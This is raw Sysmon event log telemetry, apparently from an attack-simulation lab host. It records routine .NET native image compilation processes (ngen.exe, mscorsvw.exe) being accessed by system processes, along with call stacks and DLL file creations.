13:20:29.346{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-451D-6000-6401-000000009A01}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:29.205{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-451D-6000-6301-000000009A01}2736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:29.190{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-451D-6000-6301-000000009A01}2736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:29.190{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-451D-6000-6301-000000009A01}2736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:29.033{08A6967A-4519-6000-6201-000000009A01}4132C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1024-0\WindowsBase.dll2021-01-14 13:20:29.033 10341000x80000000000000005562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:30.768{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-451E-6000-6801-000000009A01}4944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:30.768{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-451E-6000-6801-000000009A01}4944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:30.768{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-451E-6000-6801-000000009A01}4944C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:30.533{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-451E-6000-6701-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:30.518{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-451E-6000-6701-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:30.518{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-451E-6000-6701-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:30.455{08A6967A-451E-6000-6601-000000009A01}4704C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1260-0\System.Xml.Linq.dll2021-01-14 13:20:30.455 10341000x80000000000000005555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:30.065{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-451E-6000-6601-000000009A01}4704C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:30.049{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-451E-6000-6601-000000009A01}4704C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:30.049{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-451E-6000-6601-000000009A01}4704C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:31.877{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-451F-6000-6C01-000000009A01}4176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:31.877{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-451F-6000-6C01-000000009A01}4176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:31.877{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-451F-6000-6C01-000000009A01}4176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:31.768{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-451F-6000-6B01-000000009A01}3324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:31.768{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-451F-6000-6B01-000000009A01}3324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:31.768{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-451F-6000-6B01-000000009A01}3324C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:31.705{08A6967A-451F-6000-6A01-000000009A01}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b0c-0\System.Runtime.WindowsRuntime.UI.Xaml.dll2021-01-14 13:20:31.705 10341000x80000000000000005569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:31.627{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-451F-6000-6A01-000000009A01}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:31.612{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-451F-6000-6A01-000000009A01}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:31.612{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-451F-6000-6A01-000000009A01}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:31.580{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-451F-6000-6901-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:31.565{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-451F-6000-6901-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:31.565{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-451F-6000-6901-000000009A01}4980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v